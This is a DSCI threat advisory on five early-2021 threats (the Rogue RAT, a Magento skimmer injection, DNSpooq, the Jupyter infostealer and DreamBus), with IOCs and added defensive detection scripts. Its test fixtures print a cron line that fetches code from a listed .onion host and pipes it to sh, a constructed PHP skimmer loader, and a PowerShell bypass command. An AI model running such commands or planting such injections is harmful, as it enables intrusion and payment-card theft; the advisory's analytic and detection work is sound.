
TI&R © Data Security Council of India 2021 Threat Advisory


Threat Identification – DTINRS002

DSCI Threat Intelligence and Research Initiative

Threat Advisory

January-February 2021


Recent Threats

• Rogue RAT Android malware
• Magento PHP injection loading a JavaScript skimmer
• DNSpooq vulnerabilities in Dnsmasq
• Jupyter info-stealer Trojan
• DreamBus botnet malware


Threat Identification: Rogue RAT Android Malware

Synopsis:

Rogue is an Android Remote Access Trojan (RAT) assembled from two existing malware families. It is sold as a ready-made tool, so even unskilled cybercriminals gain the ability to attack and control an infected device with it.

Execution and Propagation:

Step 1: The attacker delivers the malware through social engineering or a phishing link; the device is infected once the user opens the link and installs the downloaded app.

Step 2: Once installed, the malware hides its icon and any other visible sign of its presence on the device.

Step 3: The Trojan checks whether it is running on a real device or in a virtual (emulated) environment, and stops functioning if it is not a real system, which frustrates sandbox analysis.

Step 4: It then repeatedly asks for the various permissions it needs. Because all operations run silently in the background, the malicious activity is hard for the user to notice.

Step 5: The malware registers itself as a device administrator. If the user tries to revoke the admin permission, it displays a warning stating that "all data will be deleted or wiped completely."

Fig 1: Malware hides its icon (source: https://research.checkpoint.com/2021/going-rogue-a-mastermind-behind-android-malware-returns-with-a-new-rat/)


Rogue abuses Android's Accessibility Service to track user activity: it registers for accessibility events and reacts to the following AccessibilityEvent types, which fire whenever text is typed, a view gains focus, or a view is tapped.

• TYPE_VIEW_TEXT_CHANGED
• TYPE_VIEW_FOCUSED
• TYPE_VIEW_CLICKED

Malware Characteristics:

• Rogue manipulates every application's notifications according to the attacker's instructions (Fig 3 shows it saving notification contents).
• It can record and listen to all calls going in and out of the affected device.
• User actions are recorded, and the collected data is uploaded to the command-and-control (C&C) server.
• The collected information can be sold over the dark web or to other cybercriminals.

The following figures illustrate these actions.

Fig 2: Rogue uploads data to the C&C server (source: https://research.checkpoint.com/2021/going-rogue-a-mastermind-behind-android-malware-returns-with-a-new-rat/)


Fig 3: Rogue saves notification contents (source: https://research.checkpoint.com/2021/going-rogue-a-mastermind-behind-android-malware-returns-with-a-new-rat/)

Fig 4: All calls are listened to and recorded by the attacker (source: https://research.checkpoint.com/2021/going-rogue-a-mastermind-behind-android-malware-returns-with-a-new-rat/)


IOC / Signature:

SHA-256 hashes:

af89e25c4add8bc5a5d5cd1a16479ecd8f40577766d8ea8e42eb6bcae7d3ba9d
b93ba6614762120f200efdee98ba2f5f3f3f55f152279c70422d2014f770cf8e
bcd53e2e363daf5eb719c0892d49d15261189fe8711adc9ad40fcbe646956622
c2893c0cdb3e67f3052fe3f819f03f5d52610d0904dad11aa353db202ead6c00
caa38f6ae2969e885757ff0cfce69b7981d4c115740f12cd18b4088b47a97dee

Host Indicators (shortcut name visible to the user in the menu / application package name visible in the application properties):

Apple protect          se.spitfire.appleprotect.it
Axles                  com.absolutelycold.axgle
Buzz                   com.throughtcrime.securesms
Google play service    com.demo.testing
Idea security          com.demo.testing
Security               sc.phoneix.securit
Security               com.demo.testing

Network indicators (C&C panels, defanged):

• https[:]//bald-panel[.]firebase[.]com
• https[:]//hawkshaw-cae48[.]firebase[.]com
• https[:]//spitfire panel[.]firebase[.]com
• https[:]//phoenix-panel[.]firebase[.]com

Recommendations:

• Use mobile threat defense and anti-malware protection
• Do not click on unknown links or attachments
• Conduct regular device scans
• Manage app permissions carefully; do not grant extra permissions (gallery, contacts, accessibility, device administrator) to apps that have no need for them
• Protect administrative access with strong MFA
• Monitor the activity of mobile devices regularly
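The indicators above can be turned into a simple triage script. The following Python example is added here and is not Check Point's or DSCI's tooling: it hashes candidate files against the SHA-256 list, matches the package name and launcher label from a decoded AndroidManifest.xml (the text form produced by apktool) against the host-indicator table, and flags the device-administrator receiver and accessibility service that Rogue depends on. The manifest and file contents are constructed for the demonstration, and the set of permissions treated as sensitive is this example's own choice.

```python
"""APK triage against the Rogue indicators in the advisory (added example,
not Check Point's or DSCI's tooling). Sample manifest and file contents
below are constructed; SENSITIVE_PERMS is this example's own choice."""
import hashlib
import os
import tempfile
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

ROGUE_SHA256 = {  # from the advisory's IOC list
    "af89e25c4add8bc5a5d5cd1a16479ecd8f40577766d8ea8e42eb6bcae7d3ba9d",
    "b93ba6614762120f200efdee98ba2f5f3f3f55f152279c70422d2014f770cf8e",
    "bcd53e2e363daf5eb719c0892d49d15261189fe8711adc9ad40fcbe646956622",
    "c2893c0cdb3e67f3052fe3f819f03f5d52610d0904dad11aa353db202ead6c00",
    "caa38f6ae2969e885757ff0cfce69b7981d4c115740f12cd18b4088b47a97dee",
}
ROGUE_PACKAGES = {  # package names from the host-indicator table
    "se.spitfire.appleprotect.it", "com.absolutelycold.axgle",
    "com.throughtcrime.securesms", "com.demo.testing", "sc.phoneix.securit",
}
ROGUE_LABELS = {"apple protect", "axles", "buzz", "google play service",
                "idea security", "security"}
SENSITIVE_PERMS = {  # capabilities the advisory describes: calls, SMS, contacts
    "android.permission.RECORD_AUDIO", "android.permission.READ_CALL_LOG",
    "android.permission.READ_SMS", "android.permission.READ_CONTACTS",
}


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def is_known_sample(data: bytes) -> bool:
    return sha256_hex(data) in ROGUE_SHA256


def manifest_findings(xml_text: str) -> dict:
    """Return package, label and risk tags for a decoded AndroidManifest.xml."""
    root = ET.fromstring(xml_text)
    name_attr = f"{{{ANDROID_NS}}}name"
    perm_attr = f"{{{ANDROID_NS}}}permission"
    label_attr = f"{{{ANDROID_NS}}}label"
    package = (root.get("package") or "").lower()
    app = root.find("application")
    label = app.get(label_attr, "") if app is not None else ""
    perms = {e.get(name_attr, "") for e in root.iter("uses-permission")}
    tags = []
    if package in ROGUE_PACKAGES:
        tags.append("known-rogue-package")
    if label.lower() in ROGUE_LABELS:
        tags.append("known-rogue-label")
    # A device-admin receiver must be guarded by BIND_DEVICE_ADMIN (Step 5).
    if any(r.get(perm_attr) == "android.permission.BIND_DEVICE_ADMIN"
           for r in root.iter("receiver")):
        tags.append("device-admin")
    # An accessibility service must be guarded by BIND_ACCESSIBILITY_SERVICE.
    if any(s.get(perm_attr) == "android.permission.BIND_ACCESSIBILITY_SERVICE"
           for s in root.iter("service")):
        tags.append("accessibility-service")
    sensitive = sorted(perms & SENSITIVE_PERMS)
    if sensitive:
        tags.append("sensitive-permissions")
    return {"package": package, "label": label, "tags": tags,
            "sensitive_permissions": sensitive}


def scan_dir(path: str) -> list:
    """Hash every file under path; return (name, sha256, matches_ioc)."""
    hits = []
    for dirpath, _, files in os.walk(path):
        for fn in sorted(files):
            with open(os.path.join(dirpath, fn), "rb") as fh:
                digest = sha256_hex(fh.read())
            hits.append((fn, digest, digest in ROGUE_SHA256))
    return hits


SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.demo.testing">
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <application android:label="Google play service">
    <receiver android:name=".Admin"
        android:permission="android.permission.BIND_DEVICE_ADMIN"/>
    <service android:name=".Acc"
        android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE"/>
  </application>
</manifest>"""  # constructed for the demo


def demo() -> tuple:
    """Hash a constructed (non-APK) file and triage the sample manifest."""
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "sample.apk"), "wb") as fh:
            fh.write(b"constructed, not a real apk")
        hits = scan_dir(d)
    return hits, manifest_findings(SAMPLE_MANIFEST)


if __name__ == "__main__":
    print(demo())
```

Run apktool d sample.apk first to obtain the decoded manifest; a binary AndroidManifest.xml straight out of the APK will not parse with this code.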


Threat Identification: Magento PHP Injection Loads JavaScript Skimmer

Synopsis:

Magento is an open-source e-commerce platform used by many B2C vendors. In this campaign attackers inject PHP code into a compromised Magento site; the injected code loads a JavaScript skimmer that steals payment information entered at checkout.

Execution and Propagation:

Step 1: The attacker first gains access to the site (the advisory cites social engineering or phishing) and plants the PHP injection. Before loading anything, the injected code checks two conditions on each request, and the skimmer is served only when both hold:

1. The request URI contains the text string "/onestepcheckout/index", i.e. the visitor is on the checkout page.
2. The visitor does not carry an adminhtml cookie (the Magento admin session cookie), i.e. is not a logged-in administrator or has logged out.

Because administrators are excluded, the store owner never sees the skimmer when browsing their own site.

Fig 5: Cookie check and encoded URL (source: https://blog.sucuri.net/2021/01/magento-php-injection-loads-javascript-skimmer.html)


Step 2: To stay under the radar the injection fetches the skimmer with PHP's file_get_contents(), passing the remote URL as a base64-encoded string that is decoded at runtime, so a simple search of the code base for the attacker's domain finds nothing.

Recommendations:

• Use a web application firewall
• Harden the website (including file-integrity monitoring of the code base) to prevent malware injection
• Patch any vulnerabilities present in the website and its extensions
• Keep the PHP version updated
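The two checks and the encoded loader in Steps 1 and 2 are easy to hunt for in a code base. The following Python example is added here and is not Sucuri's or DSCI's tooling. It decodes every base64_decode('...') literal in a PHP file, reports those that decode to an http(s) URL together with whether a remote-fetch call, the onestepcheckout/index URI check and the adminhtml cookie check appear in the same file, and can walk a whole Magento tree. The PHP snippet and the loader URL used in the demonstration are constructed placeholders.

```python
"""Hunt for base64-encoded remote loaders in PHP sources (added example,
not Sucuri's or DSCI's tooling). SAMPLE_PHP and SKIMMER_URL are constructed
placeholders modelled on the injection described in the advisory."""
import base64
import os
import re
import tempfile

B64_LITERAL = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
REMOTE_FETCH = re.compile(r"\b(file_get_contents|curl_exec|fopen)\s*\(")
ADMIN_COOKIE = re.compile(r"\$_COOKIE\s*\[\s*['\"]adminhtml['\"]\s*\]")
CHECKOUT_URI = "onestepcheckout/index"


def decode_b64(token: str) -> str:
    """Decode a base64 literal as PHP would (missing padding is tolerated)."""
    token += "=" * (-len(token) % 4)
    try:
        return base64.b64decode(token, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError
        return ""


def find_encoded_loaders(src: str) -> list:
    """Return one finding per base64 literal that hides an http(s) URL."""
    findings = []
    for m in B64_LITERAL.finditer(src):
        decoded = decode_b64(m.group(1))
        if not decoded.lower().startswith(("http://", "https://")):
            continue
        # Look for a fetch call in the surrounding statement.
        window = src[max(0, m.start() - 400):m.end() + 100]
        findings.append({
            "url": decoded,
            "remote_fetch": bool(REMOTE_FETCH.search(window)),
            "gated_on_checkout_uri": CHECKOUT_URI in src,
            "gated_on_admin_cookie": bool(ADMIN_COOKIE.search(src)),
        })
    return findings


def scan_tree(root: str) -> dict:
    """Walk a Magento tree; map relative path -> findings for hits only."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.endswith((".php", ".phtml")):
                continue
            full = os.path.join(dirpath, fn)
            with open(full, encoding="utf-8", errors="replace") as fh:
                hits = find_encoded_loaders(fh.read())
            if hits:
                results[os.path.relpath(full, root)] = hits
    return results


SKIMMER_URL = "https://cdn.example.invalid/assets/skim.js"  # placeholder
_B64 = base64.b64encode(SKIMMER_URL.encode()).decode()
SAMPLE_PHP = f"""<?php
// constructed injection modelled on the advisory, not a real sample
if (strpos($_SERVER['REQUEST_URI'], '/{CHECKOUT_URI}') !== false
    && !isset($_COOKIE['adminhtml'])) {{
    echo file_get_contents(base64_decode('{_B64}'));
}}
"""
CLEAN_PHP = "<?php echo base64_decode('aGVsbG8='); // 'hello', not a URL\n"


def demo() -> dict:
    """Scan a throw-away tree holding one injected and one clean file."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "app", "code"))
        with open(os.path.join(root, "app", "code", "Loader.php"), "w") as fh:
            fh.write(SAMPLE_PHP)
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write(CLEAN_PHP)
        return scan_tree(root)


if __name__ == "__main__":
    print(demo())
```

Attackers also chain strrev(), gzinflate() or str_rot13() around the literal; extend decode_b64 with those transforms before pointing this at a real site, and treat any decoded URL on an unfamiliar domain as a finding to investigate, not as proof.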

Fig 6: (source: https://blog.sucuri.net/2021/01/magento-php-injection-loads-javascript-skimmer.html)

Threat Identification: DNSpooq Vulnerabilities Affecting Dnsmasq Software

Synopsis:

Dnsmasq is a widely used open-source DNS forwarder. It ships in Android phones, home and small-office routers, and a great many IoT devices. DNSpooq is the collective name for seven vulnerabilities in Dnsmasq, which fall into two groups:

1. DNS cache poisoning
2. Buffer overflow (BOF)

Cache poisoning lets an attacker plant forged answers in the forwarder's cache, so the user believes a legitimate site is being browsed while the traffic is actually sent to an attacker-controlled host; chained with further attacks this can lead to credential theft or compromise of the device (Fig 7).

The buffer-overflow issues, illustrated by the memory layout in Fig 8, let an attacker overwrite adjacent memory by supplying oversized data, which can lead to code execution on the device. Embedded and IoT devices have limited memory and are rarely patched, so they are attractive targets. Because these weaknesses lie in how Dnsmasq handles the DNS protocol, they are fixed by code changes (input validation and stricter matching of responses to queries), not by configuration; secure redesign and input sanitization are the recommended remedies.

Fig 7: DNS cache poisoning

Fig 8: Buffer overflow memory representation


Buffer-overflow CVEs: CVE-2020-25681, CVE-2020-25682, CVE-2020-25683, CVE-2020-25687 (all in Dnsmasq's DNSSEC validation code, so they are reachable only on instances with DNSSEC enabled)

Cache-poisoning CVEs: CVE-2020-25684, CVE-2020-25685, CVE-2020-25686

Execution and Propagation:

Step 1: Shodan shows a very large number of internet-exposed devices running Dnsmasq. An attacker uses Shodan to list such devices and checks whether the Dnsmasq version is 2.82 or below (2.83 is the first fixed release).

Step 2: The attacker launches an attack against any vulnerable device using the vulnerabilities discussed above.

Step 3: Having gained a foothold on the device or inside the organisation, the attacker chains further attacks to cause disruption, deploy ransomware, or move deeper into the network.

Recommendations:

• Update Dnsmasq to version 2.83 or above; this is the only complete fix
• Enable DNSSEC validation to make cache poisoning much harder (but note that the buffer-overflow CVEs sit in the DNSSEC code, so patch before relying on it), and use encrypted DNS transports where the platform supports them
• Monitor your networks regularly for unexpected DNS answers and for exposed Dnsmasq instances
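A practitioner reading Step 1 will want to check their own forwarders rather than rely on Shodan. The following Python example is added here and is not JSOF's, DSCI's or the Dnsmasq project's code. It builds the raw CHAOS-class TXT query for version.bind, parses the answer (including DNS name-compression pointers) and classifies the reported version against the fixed release 2.83. The reply bytes used in the demonstration are constructed locally; that Dnsmasq answers this query with a string of the form dnsmasq-<version> is an assumption of the example, and an empty or filtered reply proves nothing.

```python
"""Dnsmasq version probe for the DNSpooq advisory (added example, not
JSOF's, DSCI's or the Dnsmasq project's code). Assumes the forwarder
answers a CHAOS TXT query for version.bind with "dnsmasq-<version>";
the demo reply is constructed locally."""
import random
import re
import socket
import struct

TXT, CHAOS = 16, 3
FIXED_IN = (2, 83)  # first release with the DNSpooq fixes


def build_version_query(txid: int) -> bytes:
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD set
    qname = b"\x07version\x04bind\x00"
    return header + qname + struct.pack("!HH", TXT, CHAOS)


def _read_name(data: bytes, off: int):
    """Decode a possibly compressed name; return (name, offset after it)."""
    labels, end = [], None
    while True:
        length = data[off]
        if length & 0xC0 == 0xC0:  # compression pointer: follow, remember end
            if end is None:
                end = off + 2
            off = struct.unpack("!H", data[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if length == 0:
            break
        labels.append(data[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels), (off if end is None else end)


def parse_txt_response(data: bytes, expected_txid: int) -> list:
    """Return the TXT strings of a CHAOS TXT answer, or [] if unusable."""
    txid, flags, qd, an, _, _ = struct.unpack("!HHHHHH", data[:12])
    if txid != expected_txid or not flags & 0x8000 or flags & 0x000F:
        return []  # wrong transaction id, not a response, or RCODE != 0
    off = 12
    for _ in range(qd):  # skip the echoed question section
        _, off = _read_name(data, off)
        off += 4
    strings = []
    for _ in range(an):
        _, off = _read_name(data, off)
        rtype, rclass, _ttl, rdlen = struct.unpack("!HHIH", data[off:off + 10])
        off += 10
        rdata, off = data[off:off + rdlen], off + rdlen
        if rtype == TXT and rclass == CHAOS:
            i = 0
            while i < len(rdata):  # sequence of <len><chars> items
                n = rdata[i]
                strings.append(rdata[i + 1:i + 1 + n].decode("latin-1"))
                i += 1 + n
    return strings


def assess(txt_strings: list) -> str:
    """'vulnerable' (< 2.83), 'patched' (>= 2.83 release) or 'unknown'."""
    for s in txt_strings:
        m = re.search(r"(?:dnsmasq-)?(\d+)\.(\d+)(\S*)", s)
        if not m:
            continue
        version = (int(m.group(1)), int(m.group(2)))
        if version < FIXED_IN:
            return "vulnerable"
        if version == FIXED_IN and m.group(3):  # 2.83rc/test builds may predate the fix
            return "unknown"
        return "patched"
    return "unknown"


def probe(host: str, port: int = 53, timeout: float = 2.0) -> str:
    """Query a live resolver (needs network access)."""
    txid = random.getrandbits(16)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_version_query(txid), (host, port))
        try:
            data, _ = sock.recvfrom(512)
        except socket.timeout:
            return "unknown"
    return assess(parse_txt_response(data, txid))


def constructed_response(txid: int, version_text: str) -> bytes:
    """A reply of the assumed shape, built locally for the demo."""
    question = build_version_query(txid)[12:]
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)  # QR, RD, RA
    txt = bytes([len(version_text)]) + version_text.encode()
    answer = b"\xC0\x0C" + struct.pack("!HHIH", TXT, CHAOS, 0, len(txt)) + txt
    return header + question + answer


if __name__ == "__main__":
    reply = constructed_response(0x1234, "dnsmasq-2.80")
    print(parse_txt_response(reply, 0x1234), assess(parse_txt_response(reply, 0x1234)))
```

Only probe(host) touches the network; everything else runs offline. Treat "unknown" as a prompt to confirm the version another way (package manager, firmware release notes), and remember that a forwarder can be patched for cache poisoning yet still sit behind a router whose vendor never shipped the fix.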

Threat Identification: Jupyter Trojan

Synopsis:

Jupyter is a .NET-based information-stealing Trojan that harvests critical data from infected systems. Although it primarily targets browser data (Chromium, Firefox and Chrome), it also has backdoor capabilities.

Many info-stealer Trojans with differing behaviour circulate on the dark web; the TrickBot banking Trojan, a very lightweight program, is one example.


Infection and Propagation:

Step 1: Infection begins with a downloaded zip archive containing an installer executable that poses as a legitimate file. Using a standard process-hollowing technique the installer:

1. drops and executes a script
2. drops shellcode and injects it into a legitimate Microsoft process, msinfo32.exe

Step 2: When run, the installer drops two files into the temp directory: a PowerShell script and a second, encrypted file; the script reads the encrypted file and loads it as the next stage, as shown in Fig 9.

Step 3: The PowerShell script calls functions that decode an encoded URL to fetch from. Newer versions of the installer also use the PoshC2 persistence method: they create a .LNK shortcut file and place it directly in the Windows Startup folder so the stager runs at every logon.

Fig 9: PowerShell scripts

Fig 10: (source: https://blog.morphisec.com/jupyter-infostealer-backdoor-introduction)


Step 4: Data is stolen from the browser, as shown in the screenshot in Fig 11 (Chromium browser data).

Signature / IoCs:

SHA-1 hashes:

• 26af2e85b0a50bf2352d46350744d4997448e51d
• 8133304181d209cb302fbcdbf3965b0b5c7fa20c
• f76e293d627c55eca18ce96e587fb8c6e37d8206
• d5a6ebdd65398f0a3591900192992220df49b03c

Recommendations:

• Do not open untested attachments
• Block the installation of programs from unknown sources
• Download software only from relevant, trusted sources
• Monitor resource utilisation continuously

Fig 11: Stolen data from the browser (source: https://blog.morphisec.com/jupyter-infostealer-backdoor-introduction)
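The chain in Steps 1 to 3 leaves traces that endpoint telemetry can catch. The following Python example is added here (not Morphisec's or DSCI's code) and runs simple detection logic over constructed process-creation and file-creation events with Sysmon-style field names. It flags PowerShell executing a script dropped in the user's Temp directory (Step 2), a .lnk file written to the Startup folder (the PoshC2-style persistence of Step 3), and msinfo32.exe launched by a parent living in a user-writable directory; that last rule is an inference from the process-hollowing description, not an indicator the advisory itself lists.

```python
"""Detection rules for the Jupyter chain (added example, not Morphisec's
or DSCI's code). Events below are constructed; field names follow Sysmon
conventions but the values are invented for the demo."""
import ntpath
import re

USER_WRITABLE = re.compile(
    r"\\users\\[^\\]+\\(appdata\\local\\temp|downloads)\\", re.IGNORECASE)
STARTUP_FOLDER = re.compile(
    r"\\microsoft\\windows\\start menu\\programs\\startup\\", re.IGNORECASE)
TEMP_SCRIPT = re.compile(
    r"\\appdata\\local\\temp\\[^\s\"']+\.ps1\b", re.IGNORECASE)


def classify(event: dict) -> list:
    """Return the detection tags that apply to a single event."""
    tags = []
    kind = event.get("event")
    image = ntpath.basename(event.get("image", "")).lower()
    if kind == "process_create":
        cmd = event.get("command_line", "")
        # Step 2: the dropped PowerShell stage runs from %TEMP%.
        if image == "powershell.exe" and TEMP_SCRIPT.search(cmd):
            tags.append("powershell-script-from-temp")
        # Hollowing msinfo32.exe means the installer spawns it, so a parent
        # in Downloads or Temp is suspicious (inference, not an advisory IOC).
        if image == "msinfo32.exe" and USER_WRITABLE.search(event.get("parent_image", "")):
            tags.append("msinfo32-spawned-from-user-dir")
    elif kind == "file_create":
        # Step 3: PoshC2-style persistence drops a .lnk into the Startup folder.
        target = event.get("target_filename", "")
        if target.lower().endswith(".lnk") and STARTUP_FOLDER.search(target):
            tags.append("lnk-dropped-in-startup")
    return tags


def hunt(events: list) -> list:
    """Return (index, tags) for every event that triggered at least one rule."""
    return [(i, t) for i, e in enumerate(events) if (t := classify(e))]


SAMPLE_EVENTS = [  # constructed for the demo
    {"event": "process_create",
     "image": r"C:\Users\alice\Downloads\Invoice-Setup.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "Invoice-Setup.exe"},
    {"event": "process_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Users\alice\Downloads\Invoice-Setup.exe",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\Users\alice\AppData\Local\Temp\stage1.ps1"},
    {"event": "process_create",
     "image": r"C:\Windows\System32\msinfo32.exe",
     "parent_image": r"C:\Users\alice\Downloads\Invoice-Setup.exe",
     "command_line": "msinfo32.exe"},
    {"event": "file_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target_filename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"},
    {"event": "process_create",  # benign: user opened System Information
     "image": r"C:\Windows\System32\msinfo32.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "msinfo32.exe"},
]


if __name__ == "__main__":
    for index, tags in hunt(SAMPLE_EVENTS):
        print(index, tags)
```

The three rules fire on different events, so correlate them by user and time window before alerting; a lone PowerShell script in Temp is common in enterprise tooling, but PowerShell from Temp followed by a Startup .lnk within a minute is not.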


Threat Identification: DreamBus Malware

Synopsis:

DreamBus is a Linux botnet malware. It infects a system, gives the attacker control over it, and uses the resources of the compromised machines to mine cryptocurrency (Monero).

Infection and Propagation:

Step 1: The advisory lists phishing or other social-engineering techniques as the way the initial system is infected; the spreader modules described in Steps 4 to 6 are how the bot then moves across the network.

DreamBus is built from ELF binaries that set up the environment. The binaries are packed with UPX, but the standard UPX header is replaced with another value (0x3330dddf in the sample of Fig 12) so that stock unpackers and packer signatures fail to recognise it.

Step 2: The scanning module looks for further targets. It scans RFC 1918 private address space (10.0.0.0/8, 172.16.0.0/12 and 192.168.0.0/16, the ranges that are not routed on the internet) and, in addition, the following public /8 ranges:

• [1-3].0.0.0/8
• 5.0.0.0/8
• 8.0.0.0/8
• [12-15].0.0.0/8
• 18.0.0.0/8
• 20.0.0.0/8
• [23-24].0.0.0/8
• 27.0.0.0/8
• 31.0.0.0/8

Fig 12: Modified UPX header value (source: https://www.zscaler.com/blogs/security-research/dreambus-botnet-technical-analysis)

Step 3: The DreamBus spreader module consists of seven shell scripts that drive the next stages and run several commands. It uses curl to reach the Tor network over HTTP via Tor2web gateways.

The function x() installs a cron job so the malware persists and remains reachable in future, using these paths:

• $HOME/.systems-service
• /opt/systems-service
• /etc/cron.d/0systemd-service

The cron job runs a shell script that downloads an updated copy of DreamBus over Tor.

The sockz() function tries to reach the hard-coded .onion command-and-control address through the following Tor2web gateways:

• tor2web.in
• tor2web.it
• onion.foundation
• onion.com.de
• onion.sh
• tor2web.su

Step 4: The SSH brute-force module is a shell script that downloads a tar archive into the folder below and unpacks it, producing the three files shown in Fig 13:

/tmp/.X11-unix/sshd

The module downloads the scripts, the username and password lists, and scans the local network for SSH services to brute-force. It first checks whether an SSH service is reachable using the scanner downloaded earlier.

Filename   Description
ss         pnscan, used by DreamBus to scan for SSH servers on the local network
ssh        sshpass, used to brute-force SSH passwords
PW         list of passwords for the SSH brute-force attack

The PW file contains approximately 2,711 passwords, which are passed to sshpass one by one.

Step 5: The PostgreSQL module abuses the widely deployed PostgreSQL database. It searches for PostgreSQL servers listening on port 5432 and brute-forces them with hard-coded username and password lists to gain access; the usernames tried are:

• postgres
• redmine
• root
• admin
• rdsdb
• cloudera-scm
• dbadmin
• stolon
• odoo

Step 6: Automation and orchestration tools already installed on the host, such as ansible, knife, salt and pssh, are abused to run a Base64-encoded string of shell commands on the remote systems they manage, infecting them in turn.

Step 7: A script downloads the XMRig module, which mines Monero using the /cpu command. The XMRig module is a hard-coded component that is recompiled regularly against the most recent XMRig version.

Fig 13: Files from the brute-force module


IOC / Signature:

SHA-256 hashes:

e78fc101133d1803cd462b68058c5c238f56b1fe9416e5997cfe7d44947092a2
2556c8cedd6f0ff7d16be9093bbfd0e86ede3e47fab13dfeb8d3964f10b18ea4
0e726a4fff8efeff3fdd127bed6ed28d5f51ff2c4f1e40a267984f7edae8e7d3
636accbee3f2163945886fa8f68c74449eb3d54769a1747728197e7804339b91

Mining pool IP addresses:

• 164.132.105.114
• 136.243.90.99

Fig 14: (source: https://www.zscaler.com/blogs/security-research/dreambus-botnet-technical-analysis)


Network Indicators:

• dreambusweduybcp.onion
• qsts2vqotnlh2h5xwa7fp3iopb7h7cngknjjo4f4sxhrwcqgughipxid.onion
• i62hmnztfpzwrhjg34m6ruxem5oe36nulzmxcgbdbkiaceubprkta7ad.onion

Host Indicators:

The following files and folders can be found on compromised systems:

• systemd-service.sh
• 0systemd-service
• /tmp/.X11-unix/sshd

Recommendations:

• Do not download any irrelevant and untrusted attachments

• Block the installation of programs from any unknown sources

• Monitor resource utilization continuously
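The host and network indicators above can be checked mechanically. The following Python example is added here and is not Zscaler's or DSCI's tooling. scan_host() takes a root directory, so it can be pointed at a live system or a mounted disk image, and looks for the persistence paths from Step 3, the staged brute-force tools from Step 4, and cron jobs that reference the Tor2web gateways or .onion hosts listed above; demo() builds a throw-away directory tree populated with constructed artefacts to show the output.

```python
"""Host-indicator scan for DreamBus (added example, not Zscaler's or
DSCI's tooling). Paths and domains come from the advisory; the files
demo() creates are constructed stand-ins, not real malware."""
import glob
import os
import tempfile

INDICATOR_PATHS = ["/opt/systems-service", "/etc/cron.d/0systemd-service",
                   "/tmp/.X11-unix/sshd"]
HOME_ARTEFACT = ".systems-service"  # $HOME/.systems-service
STAGED_TOOLS = {"ss", "ssh", "PW"}  # pnscan, sshpass, password list
ONION_HOSTS = ["dreambusweduybcp.onion",
               "qsts2vqotnlh2h5xwa7fp3iopb7h7cngknjjo4f4sxhrwcqgughipxid.onion",
               "i62hmnztfpzwrhjg34m6ruxem5oe36nulzmxcgbdbkiaceubprkta7ad.onion"]
TOR2WEB_GATEWAYS = ["tor2web.in", "tor2web.it", "onion.foundation",
                    "onion.com.de", "onion.sh", "tor2web.su"]


def _under(root: str, path: str) -> str:
    """Resolve an absolute indicator path beneath the scan root."""
    return os.path.join(root, path.lstrip("/"))


def scan_host(root: str = "/") -> list:
    findings = []
    for p in INDICATOR_PATHS:
        if os.path.exists(_under(root, p)):
            findings.append(f"indicator path present: {p}")
    # $HOME/.systems-service: check root's home and every account under /home.
    homes = [_under(root, "/root")] + sorted(glob.glob(_under(root, "/home/*")))
    for h in homes:
        if os.path.exists(os.path.join(h, HOME_ARTEFACT)):
            rel = "/" + os.path.relpath(h, root)
            findings.append(f"indicator path present: {rel}/{HOME_ARTEFACT}")
    staging = _under(root, "/tmp/.X11-unix/sshd")
    if os.path.isdir(staging):
        present = STAGED_TOOLS & set(os.listdir(staging))
        if present:
            findings.append("ssh brute-force tools staged: " + ", ".join(sorted(present)))
    # Cron entries that pull updates over Tor (Step 3) name a gateway or .onion host.
    for cron in sorted(glob.glob(_under(root, "/etc/cron.d/*"))):
        with open(cron, errors="replace") as fh:
            for n, line in enumerate(fh, 1):
                hit = next((d for d in ONION_HOSTS + TOR2WEB_GATEWAYS if d in line), None)
                if hit or ".onion" in line:
                    findings.append(f"cron job contacts Tor: {os.path.basename(cron)}:{n} ({hit or '.onion'})")
    return findings


def demo(populated: bool = True) -> list:
    """Scan a throw-away root, optionally seeded with constructed artefacts."""
    with tempfile.TemporaryDirectory() as root:
        if populated:
            for d in ("/etc/cron.d", "/opt", "/home/deploy", "/tmp/.X11-unix/sshd"):
                os.makedirs(_under(root, d))
            with open(_under(root, "/etc/cron.d/0systemd-service"), "w") as fh:
                # constructed line: fetch-and-run through a Tor2web gateway
                fh.write("*/5 * * * * root curl -s http://dreambusweduybcp.onion.sh/ | sh\n")
            for f in ("/opt/systems-service", "/home/deploy/.systems-service",
                      "/tmp/.X11-unix/sshd/ss", "/tmp/.X11-unix/sshd/ssh",
                      "/tmp/.X11-unix/sshd/PW"):
                open(_under(root, f), "w").close()
        return scan_host(root)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Run it as root for a live host (reading /etc/cron.d and other users' home directories needs privileges), and pair it with a check of CPU-hungry processes, since the XMRig stage of Step 7 is the part that shows up first in monitoring.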